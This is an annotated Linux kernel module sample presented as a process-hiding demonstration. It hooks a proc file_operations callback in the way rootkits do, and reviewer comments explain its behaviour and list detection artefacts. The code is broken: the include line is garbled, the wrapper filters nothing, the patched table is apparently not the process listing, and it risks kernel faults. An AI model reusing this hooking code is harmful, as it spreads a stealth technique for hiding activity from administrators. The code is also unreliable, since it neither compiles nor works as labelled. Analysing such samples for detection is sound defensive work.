/*
 * Loadable kernel module sample labelled "Process ID hiding demonstration".
 *
 * Reviewer summary of what the visible code does (as opposed to what its
 * names and log messages say):
 *   - It swaps the iterate_shared pointer in the file_operations table reached
 *     through init_net.proc_net for a wrapper defined in this file.
 *   - The wrapper forwards every directory entry unchanged; hidden_pid is
 *     never compared against anything, so no entry is filtered.
 *
 * Artefacts a defender can look for: the "PID hider:" kernel log lines, the
 * hidden_pid module parameter, and a file_operations function pointer that
 * resolves into module memory instead of core kernel text.
 *
 * NOTE(review): the header names of the ten #include directives below were
 * lost when this listing was extracted; the line cannot compile as shown.
 * NOTE(review): no MODULE_LICENSE() is visible in this listing. Modules
 * without a license declaration are normally flagged as tainting the kernel
 * on load; confirm against the full file.
 */
#include #include #include #include #include #include #include #include #include #include

MODULE_AUTHOR("Research Only");
MODULE_DESCRIPTION("Process ID hiding demonstration");
MODULE_VERSION("0.1");

/*
 * PID supplied at load time; 0 (the default) means "do nothing".
 * The permission bits are owner read/write plus group/other read, so the
 * parameter is exported through sysfs and the chosen value is readable by
 * any local user.
 * It is only read in pid_hider_init(); writing it later through sysfs has
 * no effect on whether the hook is installed.
 */
static unsigned int hidden_pid = 0;
module_param(hidden_pid, uint, S_IRUSR | S_IWUSR | S_IRGRP | S_IROTH);
MODULE_PARM_DESC(hidden_pid, "PID to hide from process listing");

/*
 * Saved copy of the iterate_shared callback that was in place before
 * hook_proc_listdir() overwrote it. Stays NULL until the hook is installed,
 * and is also NULL afterwards if the original table had no iterate_shared.
 */
static int (*orig_proc_pid_readdir)(struct file *, struct dir_context *);

/*
 * Replacement iterate_shared callback installed by hook_proc_listdir().
 *
 * Builds a local dir_context that reuses the caller's actor and position,
 * runs the saved original callback with it, copies the resulting position
 * back to the caller and returns the original's result.
 *
 * Because the caller's own actor is passed through untouched and hidden_pid
 * is not referenced, every entry the original emits still reaches the
 * caller: as written this is a pass-through, not a filter.
 *
 * orig_proc_pid_readdir is called without a NULL check; if the saved
 * pointer was NULL this dereferences a NULL function pointer in kernel
 * context.
 */
static int hider_proc_pid_readdir(struct file *file, struct dir_context *ctx)
{
	struct dir_context modified_ctx = {
		.actor = ctx->actor,
		.pos = ctx->pos
	};
	int ret = orig_proc_pid_readdir(file, &modified_ctx);

	ctx->pos = modified_ctx.pos;
	return ret;
}

/*
 * Installs the wrapper by patching a function pointer in place.
 *
 * Always returns 0; nothing in here can report failure, and neither
 * proc_root nor proc_root->proc_fops is checked for NULL.
 *
 * NOTE(review): init_net.proc_net is the proc entry of the initial network
 * namespace, so despite the local name "proc_root" and the "pid_readdir"
 * naming, the table patched here is not obviously the one that lists
 * processes. Confirm before trusting the module description.
 * NOTE(review): the cast to a non-const struct file_operations * suggests
 * the member is const-qualified. Such tables are commonly kept in read-only
 * memory, in which case the store below faults; verify for the target
 * kernel.
 * NOTE(review): this depends on struct proc_dir_entry having a proc_fops
 * member; that layout is not visible in this listing and is
 * kernel-version specific.
 */
static int hook_proc_listdir(void)
{
	struct file_operations *proc_fops;
	struct proc_dir_entry *proc_root = init_net.proc_net;

	proc_fops = (struct file_operations *)proc_root->proc_fops;
	/* Save the original first so the wrapper and the unhook path can use it. */
	orig_proc_pid_readdir = proc_fops->iterate_shared;
	/* Plain store into a shared table; no locking is visible around it. */
	proc_fops->iterate_shared = hider_proc_pid_readdir;
	return 0;
}

/*
 * Restores the saved callback, but only if the table still points at this
 * module's wrapper. When the hook was never installed (hidden_pid == 0 at
 * load) the comparison fails and nothing is written.
 *
 * If the pointer is not restored, the table keeps referencing the wrapper
 * after the module text is gone.
 */
static void unhook_proc_listdir(void)
{
	struct file_operations *proc_fops;
	struct proc_dir_entry *proc_root = init_net.proc_net;

	proc_fops = (struct file_operations *)proc_root->proc_fops;
	if (proc_fops->iterate_shared == hider_proc_pid_readdir) {
		proc_fops->iterate_shared = orig_proc_pid_readdir;
	}
}

/*
 * Module entry point. Logs to the kernel log, returns early without hooking
 * when hidden_pid is 0, otherwise logs the PID and installs the hook.
 * The return value of hook_proc_listdir() is ignored, so the load always
 * reports success.
 *
 * The three "PID hider:" messages here and the one in pid_hider_exit() are
 * fixed strings that appear in the kernel log.
 */
static int __init pid_hider_init(void)
{
	printk(KERN_INFO "PID hider: Initializing module\n");
	if (hidden_pid == 0) {
		printk(KERN_WARNING "PID hider: No PID specified, module will not hide any process\n");
		return 0;
	}
	printk(KERN_INFO "PID hider: Will hide PID %u\n", hidden_pid);
	hook_proc_listdir();
	return 0;
}

/* Module exit point: logs the unload and removes the hook if it is present. */
static void __exit pid_hider_exit(void)
{
	printk(KERN_INFO "PID hider: Unloading module\n");
	unhook_proc_listdir();
}

module_init(pid_hider_init);
module_exit(pid_hider_exit);